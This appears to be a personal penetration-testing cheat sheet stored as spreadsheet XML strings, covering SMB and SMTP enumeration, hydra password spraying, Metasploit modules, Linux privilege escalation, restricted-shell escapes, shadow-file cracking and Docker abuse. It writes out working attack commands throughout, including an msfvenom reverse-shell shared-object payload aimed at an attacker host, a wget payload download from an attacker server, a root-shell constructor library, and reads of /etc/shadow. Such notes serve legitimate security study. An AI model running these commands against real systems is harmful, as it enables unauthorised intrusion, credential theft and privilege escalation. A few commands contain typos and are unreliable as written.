445/tcp = microsoft-ds [Microsoft Naked CIFS] -smb?</t>
  </si>
  <si>
    <t>1. Port scan for samba ports
2. Check shares available and permissions
3. Access the share using smbclient</t>
  </si>
  <si>
    <t>HELP:
If get the error [protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED]
-&gt; under /etc/samba/smb.conf -&gt; under global -&gt; enter: 'client min protocol = CORE'
&amp; 'client max protocol = SMB3'</t>
  </si>
  <si>
    <t>Samba Enumeration</t>
  </si>
  <si>
    <t xml:space="preserve">nmap --script smb-enum-shares &lt;target_ip&gt; 
**NOTE: If we scan the port using nmap -A, we will get the Fully qualified domain name and other useful stuff. </t>
  </si>
  <si>
    <t>Finds shares available on the target + permissions for each share</t>
  </si>
  <si>
    <t>smbclient</t>
  </si>
  <si>
    <t xml:space="preserve">smbclient -L &lt;target_ip&gt; </t>
  </si>
  <si>
    <t>Finds shares available on the target</t>
  </si>
  <si>
    <t>smbmap</t>
  </si>
  <si>
    <t>smbmap -H &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>smbclient \\\\&lt;target_ip&gt;\\&lt;share_name&gt;</t>
  </si>
  <si>
    <t>Access the share, use anonymous creds i.e. No password or user</t>
  </si>
  <si>
    <t xml:space="preserve">mount -t cifs \\\\&lt;target_ip&gt;\\&lt;share_name&gt; &lt;directory on your machine&gt; </t>
  </si>
  <si>
    <t>Mount a SAMBA share to your machine</t>
  </si>
  <si>
    <t>rpcclient</t>
  </si>
  <si>
    <t xml:space="preserve">Samba Enumeration </t>
  </si>
  <si>
    <t xml:space="preserve"> Users</t>
  </si>
  <si>
    <t>rpc bash loop:
for u in $(cat users.txt);
 do rpcclient -U "" &lt;target_ip&gt; -N \
 --command="lookupnames $u";
done | grep "User: 1"
-&gt; users.txt is a file of common usernames (try https://github.com/insidetrust/statistically-likely-usernames)</t>
  </si>
  <si>
    <t xml:space="preserve">Output indicates that a user exists on the remote system. </t>
  </si>
  <si>
    <t>enum4linux</t>
  </si>
  <si>
    <t>enum4linux 192.168.1.10
or
enum4linux -a &lt;doamin&gt;</t>
  </si>
  <si>
    <t>Enumerate samba shares and find users</t>
  </si>
  <si>
    <t>26 / 587 / 465 - SMTP</t>
  </si>
  <si>
    <t>SMTP Enumeration</t>
  </si>
  <si>
    <t>nmap --script smtp-commands &lt;target_ip&gt; -p 25</t>
  </si>
  <si>
    <t xml:space="preserve">Enumerates which options, verbs, or features are enabled on an SMTP server. </t>
  </si>
  <si>
    <t>telnet</t>
  </si>
  <si>
    <t>telnet &lt;target_ip&gt; 25</t>
  </si>
  <si>
    <t>netcat</t>
  </si>
  <si>
    <t>nc &lt;target_ip&gt; 25</t>
  </si>
  <si>
    <t>smb-users-enum</t>
  </si>
  <si>
    <t xml:space="preserve">smpt-users-enum -M &lt;VERB&gt; -U &lt;username list.txt&gt; -t &lt;target_ip&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">Enumerate users.
VRFY = verify a user exists. 
</t>
  </si>
  <si>
    <t>Network Information:
- How is the exploited machine connected to the network?
- Is the machine multi homed? - can we pivot to other hosts in other segments?
- Is egress traffic limited to certain ports and protocols?
- Is there a firewall between me and other devices/ machines?</t>
  </si>
  <si>
    <t>netstat</t>
  </si>
  <si>
    <t>netstat -auntp</t>
  </si>
  <si>
    <t xml:space="preserve">Gives insight:
- What machines or devices we are currently connected to 
- Which ports or services on other machines we are connected to
- Which ports or current machine are listening on
- Are there other systems establishing connection withs our current machine </t>
  </si>
  <si>
    <t xml:space="preserve"> Misc</t>
  </si>
  <si>
    <t xml:space="preserve">IF netstat is not on the machine, follow the below:
https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
</t>
  </si>
  <si>
    <t>Outbound Port Connectivity</t>
  </si>
  <si>
    <t>nmap -sT -p4444-4450 portquiz.net</t>
  </si>
  <si>
    <t xml:space="preserve">Confirm that we can connect to arbritrary ports outside of our network. </t>
  </si>
  <si>
    <t>ss</t>
  </si>
  <si>
    <t xml:space="preserve">ss </t>
  </si>
  <si>
    <t xml:space="preserve">Established connections, bytes being transferred, and processes responsible for the connections. </t>
  </si>
  <si>
    <t>Command Line</t>
  </si>
  <si>
    <t>System Enumeration</t>
  </si>
  <si>
    <t>id</t>
  </si>
  <si>
    <t>Current user information</t>
  </si>
  <si>
    <t xml:space="preserve">uname -a </t>
  </si>
  <si>
    <t>Kernel version</t>
  </si>
  <si>
    <t>grep $USER /etc/passwd</t>
  </si>
  <si>
    <t>Current user information from /etc/passwd</t>
  </si>
  <si>
    <t>lastlog</t>
  </si>
  <si>
    <t>Most recent logins</t>
  </si>
  <si>
    <t>w</t>
  </si>
  <si>
    <t>who is currently logged into the system</t>
  </si>
  <si>
    <t>last</t>
  </si>
  <si>
    <t>last logged on users</t>
  </si>
  <si>
    <t>for user in $(cat /etc/passwd | cut -f1 -d":"; do id $user; done</t>
  </si>
  <si>
    <t>All users including UID and GID information</t>
  </si>
  <si>
    <t>cat /etc/passwd |cut -f1,3,4 -d":" |grep "0:0" |cut -f1 -d":" |awk '{print $1}'</t>
  </si>
  <si>
    <t>List all UID 0 (root) accounts</t>
  </si>
  <si>
    <t>cat /etc/passwd</t>
  </si>
  <si>
    <t>Read passwd file</t>
  </si>
  <si>
    <t>cat /etc/shadow</t>
  </si>
  <si>
    <t>Read shadow file (if privs)</t>
  </si>
  <si>
    <t>sudo -l</t>
  </si>
  <si>
    <t>What can we sudo without a password?</t>
  </si>
  <si>
    <t>cat /etc/sudoers</t>
  </si>
  <si>
    <t xml:space="preserve">Can we read the /etc/sudoers files? </t>
  </si>
  <si>
    <t>cat /root/.bash_history or cat /home/&lt;username&gt;/.bash_history</t>
  </si>
  <si>
    <t>Can we read the .bash_history files?</t>
  </si>
  <si>
    <t>find /home/* -name *.*history* -print 2&gt; /dev/null</t>
  </si>
  <si>
    <t>Can we read any other users' .bash_history files?</t>
  </si>
  <si>
    <t>cat /etc/issue
cat /etc/*-release</t>
  </si>
  <si>
    <t>Operating system</t>
  </si>
  <si>
    <t xml:space="preserve">sudo -l |grep vim 
sudo -l |grep nmap 
sudo -l |grep vi </t>
  </si>
  <si>
    <t>Can we sudo known binaries that allow breaking out into a shell?</t>
  </si>
  <si>
    <t>ls -als /root/</t>
  </si>
  <si>
    <t>Can we list root's home directory?</t>
  </si>
  <si>
    <t>echo $PATH</t>
  </si>
  <si>
    <t>Current $PATH environment variable</t>
  </si>
  <si>
    <t xml:space="preserve">cat /etc/crontab &amp;&amp; ls -als /etc/cron* </t>
  </si>
  <si>
    <t xml:space="preserve">List all cron jobs </t>
  </si>
  <si>
    <t>find /etc/cron* -type f -perm -o+w -exec ls -l {} \;</t>
  </si>
  <si>
    <t>Find world-writeable cron jobs</t>
  </si>
  <si>
    <t>ps auxwww</t>
  </si>
  <si>
    <t>List running processes</t>
  </si>
  <si>
    <t>ps -u root</t>
  </si>
  <si>
    <t>List all processes running as root</t>
  </si>
  <si>
    <t>ps -u $USER</t>
  </si>
  <si>
    <t>List all processes running as current user</t>
  </si>
  <si>
    <t>find / -perm -4000 -type f 2&gt;/dev/null</t>
  </si>
  <si>
    <t>Find SUID files 
SUID file = special file permission for executable files 
allows other users to run a file w/ same perms as the file owner</t>
  </si>
  <si>
    <t>find / -uid 0 -perm -4000 -type f 2&gt;/dev/null</t>
  </si>
  <si>
    <t>Find SUID files owned by root</t>
  </si>
  <si>
    <t>find / -perm -2000 -type -f 2&gt;/dev/null</t>
  </si>
  <si>
    <t>Find GUID files</t>
  </si>
  <si>
    <t>find -perm -2 -type f 2&gt;/dev/null</t>
  </si>
  <si>
    <t>Find world writable files</t>
  </si>
  <si>
    <t>ls -al /etc/*.cong</t>
  </si>
  <si>
    <t>List all conf files in /etc/</t>
  </si>
  <si>
    <t>grep pass* /etc/*.conf</t>
  </si>
  <si>
    <t>Find conf files that contain the string "pass"</t>
  </si>
  <si>
    <t>lsof -n</t>
  </si>
  <si>
    <t>List open files</t>
  </si>
  <si>
    <t xml:space="preserve">dpkg -l </t>
  </si>
  <si>
    <t>List installed packages (Debian only)</t>
  </si>
  <si>
    <t>&lt;application&gt; -v</t>
  </si>
  <si>
    <t>List software version</t>
  </si>
  <si>
    <t>ps aux | awk '{print $11}' |xargs -r ls -la 2&gt;/dev/null |awk '!x[$0]++'</t>
  </si>
  <si>
    <t>Print process binaries/ paths and permissions</t>
  </si>
  <si>
    <t>LinEnum</t>
  </si>
  <si>
    <t>Enumeration tool
https://github.com/rebootuser/LinEnum</t>
  </si>
  <si>
    <t>LinuxPrivChecker</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Used for checking privilege escalation methods. 
https://github.com/sleventyeleven/linuxprivchecker</t>
  </si>
  <si>
    <t>Unix-privesc-check</t>
  </si>
  <si>
    <t>Used for checking privilege escalation methods. 
http://pentestmonkey.net/tools/audit/unix-privesc-check</t>
  </si>
  <si>
    <t>mimipenguin</t>
  </si>
  <si>
    <t>https://github.com/huntergregal/mimipenguin</t>
  </si>
  <si>
    <t xml:space="preserve">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
</t>
  </si>
  <si>
    <t>nmap -p &lt;port&gt; --script smtp-enum-users &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>Enumerate smtp users on a mail server</t>
  </si>
  <si>
    <t>help</t>
  </si>
  <si>
    <t>Inside a share, use help to display commands</t>
  </si>
  <si>
    <t xml:space="preserve">nmap -sT -O -sV --version-all &lt;target_ip&gt; </t>
  </si>
  <si>
    <t>Detect all ports, services, banners, oS, on a remote host</t>
  </si>
  <si>
    <t>enum4linux -r &lt;target_ip&gt; | grep "Local User"</t>
  </si>
  <si>
    <t xml:space="preserve">nmap --script smb-os-discovery &lt;target_ip&gt; -p&lt;smb port&gt; </t>
  </si>
  <si>
    <t>Detect Samba version</t>
  </si>
  <si>
    <t>Exploit</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Credentials</t>
  </si>
  <si>
    <t>hydra -L &lt;userlist.txt&gt; -P &lt;passwordList.txt&gt; ssh://&lt;target_ip&gt;</t>
  </si>
  <si>
    <t>Password spray a service</t>
  </si>
  <si>
    <t>hydra -l &lt;guessed username&gt; -p &lt;guessed password&gt; -M &lt;list of ip addresses.txt&gt; &lt;service&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Attempt to login to multiple machines with compromised credentials on a particular service.
I.e. Gather local usernames from smb shares then use a password list against  a service with those usernames. 
https://linuxconfig.org/ssh-password-testing-with-hydra-on-kali-linux
</t>
  </si>
  <si>
    <t>searchsploit</t>
  </si>
  <si>
    <t>Exploit Research</t>
  </si>
  <si>
    <t>searchsploit &lt;service&gt; &lt;service version&gt; i.e. Samba 3.0.20</t>
  </si>
  <si>
    <t>Finds exploits for a particular service version</t>
  </si>
  <si>
    <t>metasploit</t>
  </si>
  <si>
    <t>Metasploit Exploitation</t>
  </si>
  <si>
    <t>use &lt;exploit path&gt;
set RHOST &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>Enable an exploit and tie a target (RHOST)</t>
  </si>
  <si>
    <t>Buffer Overflow</t>
  </si>
  <si>
    <t>Listener</t>
  </si>
  <si>
    <t>nc -nlvp &lt;port you want to listen on&gt;</t>
  </si>
  <si>
    <t>dirsearch</t>
  </si>
  <si>
    <t>Web Enumeration</t>
  </si>
  <si>
    <t>Shellshock</t>
  </si>
  <si>
    <t>python3 dirsearch.py -u &lt;target_ip&gt; -e cgi -r
i.e http://172.1.1.1</t>
  </si>
  <si>
    <t>Find CGI file</t>
  </si>
  <si>
    <t>nmap --script http-shellshock --script-args uri=/&lt;page.cgi&gt; &lt;target_ip&gt; -p &lt;port&gt;</t>
  </si>
  <si>
    <t>Heartbleed</t>
  </si>
  <si>
    <t>nmap --script ssl-heartbleed &lt;target_ip&gt;</t>
  </si>
  <si>
    <t>Identify if a server is vulnerable to heartbleed</t>
  </si>
  <si>
    <t>Metaploit Exploitation</t>
  </si>
  <si>
    <t>msf &gt; use auxiliary/scanner/ssl/openssl_heartbleed</t>
  </si>
  <si>
    <t>Scan and dump encrypted memory contents
Use show options to:Dump etc -&gt; dumps memory to 
a file in ~/.msf4/loot directory 
TRY IT AGAIN IF IT DOESNT WORK</t>
  </si>
  <si>
    <t>Java RMI</t>
  </si>
  <si>
    <t xml:space="preserve">1099 - RMI Registry </t>
  </si>
  <si>
    <t>nmap -sT &lt;target_ip&gt; -p 1099 -sV</t>
  </si>
  <si>
    <t>Linux is identified by GNU Classpath grmiregistry
Scan all ports (65k) if 1099 not there cos sometimes it has to be on other ports.</t>
  </si>
  <si>
    <t>Metasploit</t>
  </si>
  <si>
    <t>exploit/multi/misc/java_rmi_server</t>
  </si>
  <si>
    <t>Identify vulnerable RMI endpoints and exploit</t>
  </si>
  <si>
    <t>Metasploit General</t>
  </si>
  <si>
    <t>sessions -i &lt;session number&gt;</t>
  </si>
  <si>
    <t>Drop into selected session/ listener</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>Shell</t>
  </si>
  <si>
    <t xml:space="preserve">python -c 'import pty; pty.spawn("/bin/sh")' </t>
  </si>
  <si>
    <t>Upgrade a meterpreter shell</t>
  </si>
  <si>
    <t>Java Deserialisation</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>Serialisation is a process which allows for applications to convert data into a binary format, which is suitable for saving to disk. 
Data transferred over a network and into an app to be deserialized to be usable data again.</t>
  </si>
  <si>
    <t>Apache Tomcat Server</t>
  </si>
  <si>
    <t>Apache Tomcat</t>
  </si>
  <si>
    <t xml:space="preserve">Browse to the web interface on port 8180 and try some default creds. </t>
  </si>
  <si>
    <t>use auxiliary/scanner/http/tomcat_mgr_login</t>
  </si>
  <si>
    <t>Password guesser attack on Tomcat Manager</t>
  </si>
  <si>
    <t>Laudanum</t>
  </si>
  <si>
    <t>Java .war Deployment</t>
  </si>
  <si>
    <t xml:space="preserve">https://sourceforge.net/projects/laudanum/ </t>
  </si>
  <si>
    <t xml:space="preserve">Deploy our own java application into the Apache tomcat server. 
Deploy the war.cmd app from Laudanum -&gt; provides rce and control of the server. -&gt; browse to the app cmd.jsp via url. </t>
  </si>
  <si>
    <t xml:space="preserve">nmap --interactive </t>
  </si>
  <si>
    <t>Nmap interactive mode to break out of shell 
!sh to get into a shell</t>
  </si>
  <si>
    <t>URL Encoding</t>
  </si>
  <si>
    <t>8787 - dRuby</t>
  </si>
  <si>
    <t>search drb</t>
  </si>
  <si>
    <t>Nessus</t>
  </si>
  <si>
    <t>Start nessus using /etc/init.d/nessusd 
the nav to &lt;ip&gt;:8834 on browser</t>
  </si>
  <si>
    <t>Post Exploitation</t>
  </si>
  <si>
    <t>In this phase we:
- Perform additional information gathering and enumeration of any systems from a local perspective (shell, console etc)
- Elevate our privileges
- Maintain a foothold
- Pivot to other systems
- Utilize methods to exfiltrate data</t>
  </si>
  <si>
    <t>Several distinct categories:
- Additional info gathering
- Privilege Escalation
- Lateral Movement
- Data Exfiltration
- Maintaining access</t>
  </si>
  <si>
    <t>Process:Gather the below information
- system and network info
- user information
- privileged access/ cleartext credentials
- services
- jobs/ tasks
-Installed software version information</t>
  </si>
  <si>
    <t>https://book.hacktricks.xyz/linux-unix/privilege-escalation</t>
  </si>
  <si>
    <t xml:space="preserve">Privilege Escalation </t>
  </si>
  <si>
    <t xml:space="preserve"> System and Network Information</t>
  </si>
  <si>
    <t>hostname</t>
  </si>
  <si>
    <t>Does the hostname reveal anything about the systems function?</t>
  </si>
  <si>
    <t>uname -a</t>
  </si>
  <si>
    <t>Kernel
Is the kernel vulnerable to exploits</t>
  </si>
  <si>
    <t>cat /etc/issue</t>
  </si>
  <si>
    <t>Does our OS have any known exploits</t>
  </si>
  <si>
    <t>ps auxw</t>
  </si>
  <si>
    <t>Current Running Processes</t>
  </si>
  <si>
    <t>route -n</t>
  </si>
  <si>
    <t>Is the compromised machine connected to other networks? Can we use this info to pivot?</t>
  </si>
  <si>
    <t>Can we obtain info from the DNS server? AD accounts, zone transfers etc</t>
  </si>
  <si>
    <t>arp -a</t>
  </si>
  <si>
    <t>List arp cache. Have any other machines communicated with another target? are the other machines accessible to us?</t>
  </si>
  <si>
    <t>Are there any established connections from our machine to other machines and vice versa? are the comms encrypted or can we sniff them?
What ports are open and what services running</t>
  </si>
  <si>
    <t xml:space="preserve"> User Information</t>
  </si>
  <si>
    <t>cat /etc/passwd |cut -f1,3,4 -d":" |grep "0:0" |cut -f1 -d":"</t>
  </si>
  <si>
    <t>Root accounts - how many UID 0 (Root) accounts are on the system</t>
  </si>
  <si>
    <t>ls -als /home/*</t>
  </si>
  <si>
    <t>Access to other users home directories?</t>
  </si>
  <si>
    <t xml:space="preserve"> Priv Access/ Cleartext Credentials</t>
  </si>
  <si>
    <t>Can the current user execute anything with elevated privileges?</t>
  </si>
  <si>
    <t xml:space="preserve"> SUID Binaries</t>
  </si>
  <si>
    <t>find / -perm -4000 -type f 2&gt;/dev/null
find / -perm -4000 -type 2&gt;/dev/null</t>
  </si>
  <si>
    <t>Find setuid root (SUID) binaries which may be vulnerable to priv esc.
These executables run as root and can be used to gain a root shell. 
Remove -f if does not work</t>
  </si>
  <si>
    <t>grep "password" /etc/*.conf 2&gt; /dev/null</t>
  </si>
  <si>
    <t>Can we read config files that may contain passwords?</t>
  </si>
  <si>
    <t xml:space="preserve">Read shadow file. If so, grab hashes and crack </t>
  </si>
  <si>
    <t>ls -als /root</t>
  </si>
  <si>
    <t>Can we list or read contents of the /root directory?</t>
  </si>
  <si>
    <t>find /* -name *.*history* -print 2&gt;/dev/null</t>
  </si>
  <si>
    <t>Read other users' history files</t>
  </si>
  <si>
    <t>touch /var/www/file</t>
  </si>
  <si>
    <t>Can we write to directories that are configured to serve web pages?</t>
  </si>
  <si>
    <t xml:space="preserve"> Service Exploits</t>
  </si>
  <si>
    <t>find /etc/init.d ! -uid 0 -type f 2&gt;/dev/null |xargs ls -la</t>
  </si>
  <si>
    <t>Are service config files readable or modifiable by our current user?
If so, can we modify to give us elevated privs</t>
  </si>
  <si>
    <t>Service Exploits</t>
  </si>
  <si>
    <t>service &lt;service_name&gt; start/ stop</t>
  </si>
  <si>
    <t>Start or stop a service as the current user</t>
  </si>
  <si>
    <t xml:space="preserve"> Jobs/ Tasks</t>
  </si>
  <si>
    <t>cat /etc/crontab
ls -als /etc/cron.*</t>
  </si>
  <si>
    <t>Jobs or tasks the system is configured to run and at what time</t>
  </si>
  <si>
    <t xml:space="preserve">Any custom jobs or tasks configured as root that are world writeable?
Try and modify croin jobs also. </t>
  </si>
  <si>
    <t>Cron job</t>
  </si>
  <si>
    <t xml:space="preserve"> Installed Software</t>
  </si>
  <si>
    <t>dpkg -l</t>
  </si>
  <si>
    <t xml:space="preserve">Software packages installed on the system
Check for out of date ones and use 'searchsploit' to find exploits
Try and modify config files and get priv esc. </t>
  </si>
  <si>
    <t xml:space="preserve">Use to automate privilege escalation methods in Linux
wget &lt;github link to LinEnum.sh&gt;
If wget not available, transfer via netcat or copy/ paste the script into a file on compromised box. </t>
  </si>
  <si>
    <t xml:space="preserve">Enumeration tool
https://github.com/rebootuser/LinEnum
</t>
  </si>
  <si>
    <t>Links to priv esc</t>
  </si>
  <si>
    <t>https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</t>
  </si>
  <si>
    <t>Target: nc -l -p &lt;port&gt; &gt; &lt;file.sh&gt;
Attacker machine: nc -w 3 &lt;target_ip&gt; &lt;port&gt; &lt; &lt;file.sh&gt;</t>
  </si>
  <si>
    <t>Transfer files to and from a compromised machine</t>
  </si>
  <si>
    <t>File Transfer</t>
  </si>
  <si>
    <t>./LinEnum.sh -k &lt;keyword i.e. password&gt;</t>
  </si>
  <si>
    <t>LinEnum search for a keyword in configuration files</t>
  </si>
  <si>
    <t>Cheat sheet
https://cdn.members.elearnsecurity.com/ptp_v5/section_4/module_4/attachment/Post_Exploitation_Commands_Cheatsheet.pdf</t>
  </si>
  <si>
    <t>use post/linux/gather/enum_configs</t>
  </si>
  <si>
    <t>Gather common config files from an already exploited machine to your ~/.msf4/loot directory</t>
  </si>
  <si>
    <t>use post/linux/gather/enum_system</t>
  </si>
  <si>
    <t>Metasploit module to enumerate an exploited machine</t>
  </si>
  <si>
    <t>chmod</t>
  </si>
  <si>
    <t>SUID Binaries</t>
  </si>
  <si>
    <t xml:space="preserve">SUID executables are files that are run as the owner (EUID) of the file regardless of the current users privileges. </t>
  </si>
  <si>
    <t>Executables that are run with root privileges. Gain a shell on these to obtain root shell. 
Process: In order to exploit a SUID exec, we need a:
- Buffer overflow in the app (takes input and does not sanitise)
- The exec can take an argument as a command to execute, or can take a file to read
We can cat a file that the root may have access to but our current user does not. 
Or check exploit-db for odd programs which may have a local priv esc exploit</t>
  </si>
  <si>
    <t>nmap --interactive 
nmap&gt; !sh</t>
  </si>
  <si>
    <t>Get a root shell thru nmap interactive mode</t>
  </si>
  <si>
    <t>use exploit/linux/local/glibc_origin_expansion_priv_esc</t>
  </si>
  <si>
    <t>glibc $ORIGIN Expansion Priv Esc
https://seclists.org/fulldisclosure/2010/Oct/257</t>
  </si>
  <si>
    <t>sudo</t>
  </si>
  <si>
    <t>Sudo Privileged Access</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">This only works if we have access to the /etc/sudoers file. 
Configure /etc/sudoers file
Add your current user and give all commands etc 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">NOTE: RUN AS SUDO THEN TYPE THE SHELL COMMAND TO GET ROOT ACCESS </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>List of executables that if present in the sudoers file can give us root shells:
less (!sh), more (!sh), VI/VIM(:!sh), Nmap (--interactive + !sh), ftp (!sh), gdb(!sh), python, perl, irb, lua + more (just google it)
Search in gtfobins.github.io/#
https://stevendcampbell.blogspot.com/2016/04/why-sudo-tcpdump-is-dangerous.html
https://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/ (REALLY GOOD FOR TCPDUMP)</t>
  </si>
  <si>
    <t>sudo -l -&gt; lists all sudo commands we can run</t>
  </si>
  <si>
    <t xml:space="preserve">If we can run the less command as sudo, we can gain a shell </t>
  </si>
  <si>
    <t>vim</t>
  </si>
  <si>
    <t xml:space="preserve">vim editors allow us to break out into a shell </t>
  </si>
  <si>
    <t>man</t>
  </si>
  <si>
    <t>Command line "man". 
man -P "id" man -&gt; launch the id command via using man
man -P "&lt;command&gt;"
sudo man -P "cat /etc/shadow" man</t>
  </si>
  <si>
    <t xml:space="preserve">Run any command as root through the man pager </t>
  </si>
  <si>
    <t>Docker</t>
  </si>
  <si>
    <t>https://github.com/pyperanger/dockerevil</t>
  </si>
  <si>
    <t>https://medium.com/schkn/linux-privilege-escalation-using-text-editors-and-files-part-1-a8373396708d</t>
  </si>
  <si>
    <t xml:space="preserve"> Restricted Shells</t>
  </si>
  <si>
    <t xml:space="preserve">chroot -&gt; isolates users and users processes from the rest of the OS. 
Also, rbash shell </t>
  </si>
  <si>
    <t>ENV</t>
  </si>
  <si>
    <t>Use EnV command to find out what our current shell is</t>
  </si>
  <si>
    <t>vi /tmp/test
:!sh &lt;enter&gt; while in the vim editor</t>
  </si>
  <si>
    <t>find &lt;any directory that actually exists&gt; -name &lt;file that exists&gt; -exec /bin/sh \;</t>
  </si>
  <si>
    <t>Execute a shell if a file is true to break out of r shell</t>
  </si>
  <si>
    <t>python -c 'import pty; pty.spawn("/bin/sh")</t>
  </si>
  <si>
    <t>Break out of a restricted shell with python</t>
  </si>
  <si>
    <t>Perl</t>
  </si>
  <si>
    <t>perl -e 'exec "/bin/sh";'</t>
  </si>
  <si>
    <t>Break out of a restricted shell with perl</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>Restricted Shells</t>
  </si>
  <si>
    <t>22 - SSH</t>
  </si>
  <si>
    <t>ssh -i &lt;ssh_key&gt; restricted_user@&lt;target_ip&gt; -t "/bin/sh"</t>
  </si>
  <si>
    <t>Connect with ssh and execute a shell before the restricted shell is initialized on the target</t>
  </si>
  <si>
    <t xml:space="preserve"> Cracking Shadow File</t>
  </si>
  <si>
    <t>Only root, passwd programs can modify the /etc/passwd and /etc/shadow files
Hash is the second column after the username.
Uses SHA-512 -&gt; $6$ is the indicator
Once we get root, we can dictionary attack the hashes in the /etc/shadow file</t>
  </si>
  <si>
    <t xml:space="preserve">MD5 ($1$) = easiest to crack
</t>
  </si>
  <si>
    <t>unshadow</t>
  </si>
  <si>
    <t>Unshadow combines /etc/passwd and /etc/shadow to format them in a way that John the Ripper can crack the hashes. 
$ unshadow &lt;passwd file&gt; &lt;shadow file&gt; &gt; shadow.john</t>
  </si>
  <si>
    <t>John the Ripper</t>
  </si>
  <si>
    <t>$john &lt;shadow file from unshadow&gt; --wordlist=&lt;wordlist file path&gt;</t>
  </si>
  <si>
    <t>Crack hashes</t>
  </si>
  <si>
    <t>Mimipenguin</t>
  </si>
  <si>
    <t>Tool to obtain root password from the machines memory. similar to mimikatz but for Linux</t>
  </si>
  <si>
    <t>swapon</t>
  </si>
  <si>
    <t xml:space="preserve"> Swap Memory Credentials</t>
  </si>
  <si>
    <t>swapon -s</t>
  </si>
  <si>
    <t xml:space="preserve">Find the file or partition defined as the swap file. </t>
  </si>
  <si>
    <t>strings &lt;swapon file&gt; |grep "password="
strings &lt;swapon file&gt; |grep "&amp;password="</t>
  </si>
  <si>
    <t>Find passwords in the swapon file
https://github.com/sevagas/swap_digger</t>
  </si>
  <si>
    <t xml:space="preserve"> Shared Object Library </t>
  </si>
  <si>
    <t>we can elevate privs via .so files. SOLs are basically DLLs for Linux. 
Firstly we need to:
- Determine the shared objects that are being loaded by an executable
- Determine if the application was compiled with RPATH or RUNPATH options. If yes, can we write into the locations specified by the either of those options?</t>
  </si>
  <si>
    <t xml:space="preserve">ldd &lt;filepath to executable program we want to check i.e. /usr/local/bin/program&gt; </t>
  </si>
  <si>
    <t>Determine the shared object libraries being loaded by an executable</t>
  </si>
  <si>
    <t>objdump -x &lt;filepath to exec program we want to check&gt; |grep RPATH
objdump -x &lt;filepath to exec program we want to check&gt; |grep RUNPATH</t>
  </si>
  <si>
    <t xml:space="preserve">Determine if the executable was compiled with RPATH options
If the output is /tmp/program/libs then is links to RPATH
If confirmed, we can place our malicious .so file into the /tmp/program/libs directory 
Malicious file: Spawn a shell
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("bin/bash -p");
}
Compile to a .so program so it is loaded when the SO library runs. 
</t>
  </si>
  <si>
    <t>Msfvenom</t>
  </si>
  <si>
    <t xml:space="preserve">msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=&lt;your/ attacker ip&gt; \ LPORT=&lt;attacker LPORT i.e 4444&gt; -f elf-so -o &lt;program name i.e. program.so&gt; </t>
  </si>
  <si>
    <t>Create a SO payload file. NOTE: this payload must be named the same as a .so file found in the ldd command results i.e. a shared object library being loaded when an executable is run. 
Cheatsheet:
https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/</t>
  </si>
  <si>
    <t>On attacker: python -m SimpleHTTPServer 80
On target: cd /tmp/program/libs (for Shared Object Library) &amp;&amp; wget http://&lt;attacker_ip&gt;/&lt;payload filepath&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Transfer a payload from attacker to target machine </t>
  </si>
  <si>
    <t>use exploit/multi/handler -&gt; ensure same port and stuff as payload</t>
  </si>
  <si>
    <t>Configure a metasploit listener</t>
  </si>
  <si>
    <t>Handler</t>
  </si>
  <si>
    <t xml:space="preserve"> Kernel Exploits</t>
  </si>
  <si>
    <t>Kernel Exploits include:
- Buffer overflows
- Memory corruption
- Denial of Service
- Race Conditions</t>
  </si>
  <si>
    <t>Kernel exploits will usually be pre compiled binaries, c source code (.c files), or metaspoit exploit modules</t>
  </si>
  <si>
    <t>searchsploit "linux kernel debian" example</t>
  </si>
  <si>
    <t>linux_exploit_suggester</t>
  </si>
  <si>
    <t>perl Linux_Exploit_Suggester.pl -k &lt;your kernel version&gt;
Note: We do not need the -k option</t>
  </si>
  <si>
    <t>https://github.com/InteliSecureLabs/Linux_Exploit_Suggester
https://github.com/jondonas/linux-exploit-suggester-2</t>
  </si>
  <si>
    <t>gcc</t>
  </si>
  <si>
    <t>c/c++ compiler
gcc --version</t>
  </si>
  <si>
    <t xml:space="preserve">gcc -pthread (optional) &lt;exploit c file i.e exploit.c&gt; -o &lt;exploit_name&gt;
add exec permissions -&gt; chmod +x exploit_name 
./exploit_name to run </t>
  </si>
  <si>
    <t xml:space="preserve">Compile a c file to exec.
Remember to change the perms on the exploit in order to execute it on the target machine. </t>
  </si>
  <si>
    <t xml:space="preserve">gcc -m32 exploit.c -o exploit_name </t>
  </si>
  <si>
    <t xml:space="preserve">Compile a 32bit binary 
Then transfer to target
We must compile the exploit to the same architecture as the machine we want to target. </t>
  </si>
  <si>
    <t xml:space="preserve"> Unix Socket Exploitation</t>
  </si>
  <si>
    <t xml:space="preserve">Use Docker to exploit insecure port, as Docker uses UDP port, which by default is owned by root. 
If an unprivileged user has access to the docker command. 
docker run -v /etc/shadow:/docker/hashedpasswords -p postgres
docker exec -ti &lt;container_id&gt; bash 
cat /docker/hashedpasswords &gt; /docker/test.txt 
chmod 777 /docker/test.txt
